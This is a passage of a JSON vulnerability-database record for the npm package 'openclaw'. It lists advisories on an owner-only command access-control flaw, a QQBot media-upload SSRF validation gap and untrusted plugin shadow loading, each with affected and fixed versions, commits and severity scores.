5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35619","GHSA-68f8-9mhj-h2mp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nfva-pukn-uqch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91080?format=json","vulnerability_id":"VCID-njsr-j7vm-cqg8","summary":"OpenClaw: Command-authorized non-owners could reach owner-only `/config` and `/debug` surfaces\n### Summary\n\nOpenClaw documented `/config` and `/debug` as owner-only commands, but the command handlers checked only whether the sender was command-authorized. A lower-trust sender who was intentionally allowed to run commands could still reach privileged configuration and debugging surfaces.\n\n### Impact\n\nThis allowed a non-owner sender to read or change privileged configuration that should have remained restricted to owners.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Owner checks are now enforced for privileged command surfaces, and regression tests cover `/config` and `/debug` access control.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/08aa57a3de37d337b226ae861f573779f112ff2e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/08aa57a3de37d337b226ae861f573779f112ff2e"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44305","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44305"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r7vr-gr74-94p8","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r7vr-gr74-94p8"},{"reference_url":"https://github.com/advisories/GHSA-r7vr-gr74-94p8","reference_id":"GHSA-r7vr-gr74-94p8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r7vr-gr74-94p8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-r7vr-gr74-94p8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-njsr-j7vm-cqg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89344?format=json","vulnerability_id":"VCID-nkh4-j2pe-1qhr","summary":"OpenClaw: QQBot direct media upload skipped URL SSRF validation\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe QQBot direct-upload media path could forward attacker-controlled image URLs without applying the SSRF validation used by the local download path. This could make configured QQBot media delivery request or relay URLs the operator did not intend to allow.\n\nThe affected path is limited to QQBot outbound media handling and does not expose arbitrary local files. Severity is low.\n\n## Fix\n\nOpenClaw now validates QQBot direct-upload media URLs before `uploadC2CMedia` and `uploadGroupMedia` direct-upload calls.\n\nFix commit:\n\n- `49db424c8001f2f419aad85f434894d8d85c1a09`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44117","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12782","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12786","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14064","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44117"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44117","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44117"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload"},{"reference_url":"https://github.com/advisories/GHSA-c4qg-j8jg-42q5","reference_id":"GHSA-c4qg-j8jg-42q5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c4qg-j8jg-42q5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44117","GHSA-c4qg-j8jg-42q5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nkh4-j2pe-1qhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89245?format=json","vulnerability_id":"VCID-ns77-4wfj-9ka6","summary":"OpenClaw: Channel setup catalog lookups could include untrusted workspace plugin shadows\n## Summary\n\nChannel setup catalog lookups could include untrusted workspace plugin shadows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nChannel setup could resolve a workspace plugin shadow before a bundled channel plugin, causing setup-time plugin loading without the intended trust gate.\n\n## Technical Details\n\nThe fix routes setup catalog lookups through trusted catalog paths and uses `excludeWorkspace: true` where setup should not include workspace shadows.\n\n## Fix\n\nThe issue was fixed in the advisory fix branch. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `1fede43b948df40ca8674511d4bd08d39f6c5837`\n- PR: private advisory fork\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43571","reference_id":"","reference_type":"","scores":[{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15125","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17378","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17414","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43571"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837"},{"reference_url":"https://github.com/openclaw/op